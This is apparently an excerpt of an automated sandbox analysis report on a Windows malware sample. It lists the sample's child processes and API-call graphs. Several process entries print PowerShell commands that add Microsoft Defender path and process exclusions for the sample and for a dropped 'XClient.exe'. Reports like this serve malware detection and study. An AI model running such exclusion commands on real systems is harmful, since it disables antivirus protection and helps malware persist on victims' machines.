                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe'
                                                                  Imagebase:0x550000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:16:05:06
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:16:05:11
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'THITWNSEI24112908089786756456545346568789-00010.scr.exe'
                                                                  Imagebase:0x550000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:16:05:11
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:16:05:15
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                                                                  Imagebase:0x550000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:16:05:15
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:16:05:20
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                  Imagebase:0x550000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:16:05:20
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true


                                                                    Execution Graph

                                                                    Execution Coverage:7.6%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:37
                                                                    Total number of Limit Nodes:5

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02E7B03E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 96cafbb635486524585d9103635c2e354e0571eff35067fb2fa96a220e7a938f
                                                                    • Instruction ID: b2dc774b7c5d60644818f6cc34149ca62344d2d5b37ad730acbae21d5386c4f8
                                                                    • Opcode Fuzzy Hash: 96cafbb635486524585d9103635c2e354e0571eff35067fb2fa96a220e7a938f
                                                                    • Instruction Fuzzy Hash: 0B710470A00B058FE728DF69D54475ABBF1FF88304F00992DD48A97B40DB75E845CB95

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 02E759C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 81f0124ed852fc6bc35dc9d50ca04d27ad630252e980aaa17addea375568ff3f
                                                                    • Instruction ID: 2096f13c12f36946aea6398d4d94637a181a53f9a820a8e956743876ea5b5721
                                                                    • Opcode Fuzzy Hash: 81f0124ed852fc6bc35dc9d50ca04d27ad630252e980aaa17addea375568ff3f
                                                                    • Instruction Fuzzy Hash: 2841C171C0071DCBEB24CFA9C984BDEBBB5BF48704F60816AD809AB251DBB56945CF90

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 02E759C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 5c878dc672486c2bdb6ff04ee1dbdf6304fd8ace457b51798276e534bf929832
                                                                    • Instruction ID: 7753693587dec5b936860d8d16dbdde415f15953908ce386cdc77036f87021c6
                                                                    • Opcode Fuzzy Hash: 5c878dc672486c2bdb6ff04ee1dbdf6304fd8ace457b51798276e534bf929832
                                                                    • Instruction Fuzzy Hash: 0341D1B1C00719CBEF24DFA9C9847DDBBB5BF48304F60816AD418AB251DBB5694ACF50

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E7D686,?,?,?,?,?), ref: 02E7D747
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 3fb230eb60ba3903f636bdb51ffc8d533dae05c274661432e91969aad93682be
                                                                    • Instruction ID: 7c4cc569a49566a9d14972e8d2b73e67a59c4a2e02d792de14a1bc931ec0baf6
                                                                    • Opcode Fuzzy Hash: 3fb230eb60ba3903f636bdb51ffc8d533dae05c274661432e91969aad93682be
                                                                    • Instruction Fuzzy Hash: EB21E3B5900249DFDB10CF9AD984AEEBBF9EF48320F14845AE918A3310D375A950CFA5

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E7D686,?,?,?,?,?), ref: 02E7D747
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: fd5754a4252087f86ef56fa65f074aac65aa02a32bf29b2a6264f07dbccb628c
                                                                    • Instruction ID: de914328fcc2a48335bfba3028a7220ad4a4e378736627e38f93a56fec0a5756
                                                                    • Opcode Fuzzy Hash: fd5754a4252087f86ef56fa65f074aac65aa02a32bf29b2a6264f07dbccb628c
                                                                    • Instruction Fuzzy Hash: 6121E0B5900209DFDB10CFAAD984AEEBBF5FF48324F14845AE918B3210D378A954CF60

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02E7B03E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: c65f04b0059bcb1eae999504f8fc9cf656cf3bd7bc0d62f3319bd6ac2f129001
                                                                    • Instruction ID: 16072f66fa15fd33796372574a243f22f460dc87fbc8afb8b83dc6cf1ea82a57
                                                                    • Opcode Fuzzy Hash: c65f04b0059bcb1eae999504f8fc9cf656cf3bd7bc0d62f3319bd6ac2f129001
                                                                    • Instruction Fuzzy Hash: 4A11FDB6800649CBDB10CF9AC544BDEFBF4BB88328F10845AD529A7200D3B9A545CFA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156315443.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_124d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 771faf049aa774dcdf6afb51756887b8e3d2aec28cc5df597df0b295de29dd0d
                                                                    • Instruction ID: 0b48a9a1bbeb79a99ee79ceb1c1790f63deeca48e2db4e9fa9356614fdd071b3
                                                                    • Opcode Fuzzy Hash: 771faf049aa774dcdf6afb51756887b8e3d2aec28cc5df597df0b295de29dd0d
                                                                    • Instruction Fuzzy Hash: 59214572610248EFDB09DF54E9C0B2ABF61FB98318F20C16DEA090B256C776D416CAE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156315443.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_124d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 603b00d4a2f92c4010efca2fed1e8c5cda1f8839f63df3273b0d9cb52eae4108
                                                                    • Instruction ID: fb90da1f6d05090d508ac0df78f2686abebc4dfcb2a9fa40a1f6bf7f21b04112
                                                                    • Opcode Fuzzy Hash: 603b00d4a2f92c4010efca2fed1e8c5cda1f8839f63df3273b0d9cb52eae4108
                                                                    • Instruction Fuzzy Hash: 4B216A76510208DFDB09DF54D9C0B66BF65FB94324F20C16CEA0A0B257C37AE456CBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156386437.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_126d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 184e346be0e6e9c45a26855025576102009fdc0bf8b14de6003119d44a72e317
                                                                    • Instruction ID: ff90db1a7ab7d037585bf875c9390809bd8e26dc55cf78ad67d15f3789ddabe8
                                                                    • Opcode Fuzzy Hash: 184e346be0e6e9c45a26855025576102009fdc0bf8b14de6003119d44a72e317
                                                                    • Instruction Fuzzy Hash: 5721797161430CEFDB05DF94C5C0B25BB69FB84324F20C56CD9894B293C376D486CA61
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156386437.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_126d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6896d035051827bdcd73699bb65fc583766a253e7f4e64584ac527baeebce6f7
                                                                    • Instruction ID: c6c1cde34c9e85f762fca401d62193350825502254cff71f791bae12e2e16290
                                                                    • Opcode Fuzzy Hash: 6896d035051827bdcd73699bb65fc583766a253e7f4e64584ac527baeebce6f7
                                                                    • Instruction Fuzzy Hash: 1521457521420CDFCB14DF54D5C0B26BB69FB84314F20C56DD98A0B292C377D487CAA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156315443.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_124d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                    • Instruction ID: 518990d40ede8e5519da9da721531115432c218e07a6ce66393d1419e0bb3195
                                                                    • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                    • Instruction Fuzzy Hash: CC112676504284CFCB16CF54E5C0B16BF71FB94318F24C6A9D9090B257C33AD45ACBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156315443.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_124d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                    • Instruction ID: c2115975d72402675f5b20633aed71bc88b2fa7679637ed3ae7e3951d155bf39
                                                                    • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                    • Instruction Fuzzy Hash: A11126B6404284CFCB06CF54D5C0B56BF71FB94324F24C2A9D9090B257C33AE456CBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156386437.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_126d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                    • Instruction ID: dd9f6d10dd3d091b919494bd8f24a61c58299c8602d529120df7f452cbcaca8e
                                                                    • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                    • Instruction Fuzzy Hash: 1111BE75604288CFCB12CF54D5C4B15BB61FB84314F24C6A9D9494B696C33BD44ACBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156386437.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_126d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                    • Instruction ID: aab42ea892bd547d45022cb9ff1e972750d7d02d563ccd0c32a2db151629985c
                                                                    • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                    • Instruction Fuzzy Hash: F111BE75604288DFDB12CF54C5C0B15BB61FB84224F28C6A9D9494B297C33AD44ACB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7fd4a53a23944f7f8f885e1943bd02d478960b99d5d701be145b1d289013dcc6
                                                                    • Instruction ID: c760f5bb10846a31fc607a547f4b523c2857ded3360f0036466a7f8f8bc88ec7
                                                                    • Opcode Fuzzy Hash: 7fd4a53a23944f7f8f885e1943bd02d478960b99d5d701be145b1d289013dcc6
                                                                    • Instruction Fuzzy Hash: E6A16B36E50209CFCF15DFB4C84459EBBB2FF85304B25956AE902AB261DB71E916CB80

                                                                    Execution Graph

                                                                    Execution Coverage:13.6%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:205
                                                                    Total number of Limit Nodes:19
                                                                    execution_graph: [node/edge listing of the interactive graph omitted; rendering not recoverable as text]. API calls reached from the graph nodes: GlobalMemoryStatusEx (58b3bb8, 58b4548, 58b458e), GetCurrentProcess, GetCurrentThread, GetCurrentThreadId (310e4a0 region), DuplicateHandle (310e6e8), GetModuleHandleW (6691341, 6696d80 and callers), PeekMessageW (669ce98), WaitMessage (669e740), SetWindowsHookExW (3107a6c), CreateWindowExW (66991b8), CallWindowProcW (669739c / 669b7aa and callers).

                                                                    Control-flow Graph

                                                                    control_flow_graph: function 669e278-669e7ff [executed/not-executed block colouring and edge listing omitted]; blocks call 669ce98 (PeekMessageW), 669de64/669de70/669de7c/669de88/669de98/669dea4/669deb0 and WaitMessage (block 669e740-669e76c).
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 39259e5b95bb529422e402bf300dbb04c1932e11054cc982231469e27aab4ea1
                                                                    • Instruction ID: 0e425715515ab134e7f1702ca568e3b4ca04547746dbfcf5c527aba26f0bc573
                                                                    • Opcode Fuzzy Hash: 39259e5b95bb529422e402bf300dbb04c1932e11054cc982231469e27aab4ea1
                                                                    • Instruction Fuzzy Hash: 0DF13930A00209CFEF54DFA9C944B9DBBF5FF88314F148168E909AB3A5DB71A945CB91

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 0310E51E
                                                                    • GetCurrentThread.KERNEL32 ref: 0310E55B
                                                                    • GetCurrentProcess.KERNEL32 ref: 0310E598
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0310E5F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4572476188.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_3100000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 8d2b94dae577126e9fa7e87fda5b051e6fadc1123c384fe1307b03d924e316a4
                                                                    • Instruction ID: 1d3d7ebbd78a988ff1570d1bf3901ddc566a7bd9d8c6454157c988dc120d3f91
                                                                    • Opcode Fuzzy Hash: 8d2b94dae577126e9fa7e87fda5b051e6fadc1123c384fe1307b03d924e316a4
                                                                    • Instruction Fuzzy Hash: A45164B090074A8FDB54DFAAD548B9EBBF1FF88318F208459E409A7390DB74A944CF65

                                                                    Control-flow Graph

                                                                    control_flow_graph: function 6696b38-6696dc8 [block colouring and edge listing omitted]; internal calls to 6695ae0, 6695aec, 6695afc, 6693a4c, 6696dd1/6696de0 and 66970b1/66970c0; API call GetModuleHandleW in block 6696d80-6696dab.
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06696D9E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 4d040b5d4549aad6d54f38bfbe7e34b895919397285d5ea465d76cba5e8207ea
                                                                    • Instruction ID: ead9b0b07b576143bc7b419f1e7a95abb0c8dbb07cc2c788fc9d3740131a1b69
                                                                    • Opcode Fuzzy Hash: 4d040b5d4549aad6d54f38bfbe7e34b895919397285d5ea465d76cba5e8207ea
                                                                    • Instruction Fuzzy Hash: 28812770A00B058FEBA4DF29C44475ABBF5FF88204F00892DD89AD7B50D775E849CBA4

                                                                    Control-flow Graph

                                                                    control_flow_graph: function 58b4470-58b45ed [block colouring and edge listing omitted]; internal calls to 58b3bac and 58b3bb8; API call GlobalMemoryStatusEx in block 58b452f-58b45bc.
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4586654532.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_58b0000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ee9576573855ecda9b0dd1e3398e6cb5e84f271177a223e75d70c453329bfa4d
                                                                    • Instruction ID: 5ede69a4eec9d7617097b1391bbbb55337a3b25b04aa8794bbc641c36ed8117f
                                                                    • Opcode Fuzzy Hash: ee9576573855ecda9b0dd1e3398e6cb5e84f271177a223e75d70c453329bfa4d
                                                                    • Instruction Fuzzy Hash: 98413132E043859FDB04CFA9D8007AEBBF6AFC8220F04856AD808E7351DBB49844CBD1

                                                                    Control-flow Graph

                                                                    control_flow_graph: function 6699145-66992c1 [block colouring and edge listing omitted]; API call CreateWindowExW in block 6699213-6699272.
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06699262
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 1bf5d2d296f73922c8f4849cc5f7bd296f0fabda0ed32f322149fb0299fab7b0
                                                                    • Instruction ID: e99f637770e6de628f27ff9d0315a4d95f774c0b91a5539988860dd0fe59f971
                                                                    • Opcode Fuzzy Hash: 1bf5d2d296f73922c8f4849cc5f7bd296f0fabda0ed32f322149fb0299fab7b0
                                                                    • Instruction Fuzzy Hash: 535190B1D113499FDF14CF9AC884ADEBBB5BF48310F24862EE819AB250D7759845CFA0

                                                                    Control-flow Graph

                                                                    control_flow_graph: function 6699150-66992c1 [block colouring and edge listing omitted]; API call CreateWindowExW in block 66991d3-6699272.
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06699262
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: e225ee85a0f711af61598af850558325b8d6b9eb37dcf4e6bf2746fb0c6881e4
                                                                    • Instruction ID: 4597f0a7266429070ebf4f7ab6dca95084e174d337ba80aeae735b8857a0e186
                                                                    • Opcode Fuzzy Hash: e225ee85a0f711af61598af850558325b8d6b9eb37dcf4e6bf2746fb0c6881e4
                                                                    • Instruction Fuzzy Hash: 34419FB1D103499FDF54CF9AC884ADEBBB5BF48310F24862AE819AB250D775A845CF90

                                                                    Control-flow Graph

                                                                    control_flow_graph: function 669739c-669b82c [block colouring and edge listing omitted]; internal call to 6697274; API call CallWindowProcW in block 669b7aa-669b7e2.
                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0669B7D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: 20f8d29eb3a0b17c1c9ded8a2888194a7249e246802f9e9533f35d849f5d705f
                                                                    • Instruction ID: 4662cbedc021b1fa97bbb2b87c66209d42f53d1b5a9862744990f03470270cda
                                                                    • Opcode Fuzzy Hash: 20f8d29eb3a0b17c1c9ded8a2888194a7249e246802f9e9533f35d849f5d705f
                                                                    • Instruction Fuzzy Hash: 58413BB4900309DFDB94CF59C488AABBBF5FF88314F14C559D519AB321D775A841CBA0

                                                                    Control-flow Graph

                                                                    control_flow_graph: function 310e16c-310e7a2 [block colouring and edge listing omitted]; API call DuplicateHandle in block 310e16c-310e77c.
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0310E6AE,?,?,?,?,?), ref: 0310E76F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4572476188.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_3100000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 03107AA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4572476188.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_3100000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 03107AA3
                                                                    Memory Dump Source
